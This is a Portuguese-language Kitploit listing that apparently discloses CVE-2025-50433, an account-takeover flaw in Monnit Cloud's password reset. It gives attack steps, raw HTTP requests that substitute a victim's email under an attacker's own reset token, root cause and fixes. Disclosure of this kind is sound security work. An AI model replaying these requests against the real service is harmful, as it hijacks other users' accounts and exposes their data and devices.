Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-50433 — Prova de conceito para uma tomada de conta crítica no Monnit Cloud (CVE-2025-50433), explorando a ausência de validação token-e-mail na redefinição de senha e fornecendo etapas de ataque, causa raiz e remediação. | Kitploit
Ferramentas/GitHubGitHub/0xmandor/cve-2025-50433
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoAutenticação
GitHub0xmandor/cve-2025-50433

CVE-2025-50433

Prova de conceito para uma tomada de conta crítica no Monnit Cloud (CVE-2025-50433), explorando a ausência de validação token-e-mail na redefinição de senha e fornecendo etapas de ataque, causa raiz e remediação.

Ver Repositório
1há 9 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-50433 — Vulnerabilidade Crítica de Apropriação de Conta que Afeta as Plataformas Monnit Cloud (*.imonnit.com)

Resumo

Existe uma vulnerabilidade crítica de autenticação em *.imonnit.com que permite a apropriação total de conta (ATO) em qualquer conta de usuário sem interação da vítima.

O backend não valida a associação entre o token de redefinição de senha e o e-mail alvo, permitindo que atacantes usem seu próprio token de redefinição válido para redefinir a senha de qualquer conta de vítima.


Vetor de Ataque (Prova de Conceito Passo a Passo)

  1. O atacante cria a conta A ([email protected]).
  2. A vítima tem a conta B ([email protected]).
  3. O atacante solicita redefinição de senha para A e B.
  4. O atacante recebe um token de redefinição válido apenas para a conta A.
  5. O atacante abre o formulário de redefinição de senha usando o token :
A
root@kitploit:~
    POST /Account/PasswordReset/?VerificationCode=TTT4EB4I HTTP/1.1
    Host: www.imonnit.com
    Cookie: ASP.NET_SessionId=jf3y4eg3qdrefnfnqcj42yut; __RequestVerificationToken=dObesuZNYwsn9USVixM8aZTa9i_E_18PRpfCE0L39NUJlfolWpjSYX0BW32_mK50O5fcGbr3oBMg2S6D4ONl0bJhJS4kmxtHeQEn8Y0kNNt324q5Hc0Gu3JBHH7CwrylvP8XNQ2

    __RequestVerificationToken=-realtoken5K0nzPC8H2Aw2&NewPassword=1!Password%21&ConfirmPassword=1!Password%21&[email protected]&[email protected]
  1. Antes de enviar, o atacante altera os campos de e-mail e nome de usuário para o e-mail da vítima:
root@kitploit:~
    POST /Account/PasswordReset/?VerificationCode=TTT4EB4I HTTP/1.1
    Host: www.imonnit.com
    Cookie: ASP.NET_SessionId=jf3y4eg3qdrefnfnqcj42yut; __RequestVerificationToken=dObesuZNYwsn9USVixM8aZTa9i_E_18PRpfCE0L39NUJlfolWpjSYX0BW32_mK50O5fcGbr3oBMg2S6D4ONl0bJhJS4kmxtHeQEn8Y0kNNt324q5Hc0Gu3JBHH7CwrylvP8XNQ2

    __RequestVerificationToken=-realtoken5K0nzPC8H2Aw2&NewPassword=1!Password%21&ConfirmPassword=1!Password%21&[email protected]&[email protected]
  1. O backend aceita incorretamente o e-mail + token incompatíveis.
  2. A senha da vítima é redefinida e o atacante obtém acesso total à conta da vítima.

Impacto

  • Apropriação Total de Conta (ATO).
  • Acesso completo aos painéis, sensores e dados da conta da vítima.
  • Capacidade de modificar dispositivos, notificações e configurações.
  • Escalação de privilégios sem interação da vítima.
  • Exploração remota sem pré-requisitos.

Gravidade

CVSS 3.1: 9.8 (Crítica)
Vetor: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H


Domínios Afetados

root@kitploit:~
*.imonnit.com

Causa Raiz

O endpoint de redefinição de senha não valida se o token de redefinição pertence ao mesmo e-mail fornecido durante a operação de redefinição, permitindo redefinições arbitrárias de senha usando tokens controlados pelo atacante.


Endpoint Afetado

root@kitploit:~
/Account/PasswordReset/

Fornecedor: Monnit Corporation


Recomendações

  • Aplicar validação rigorosa de vinculação token–e-mail no backend.
  • Rejeitar qualquer solicitação de redefinição de senha onde o token não corresponda à conta associada.
  • Invalidar tokens imediatamente após o uso.

Descobridor

Mohamed Mandor (0xmandor) GitHub: https://github.com/0xmandor

Baixar ferramenta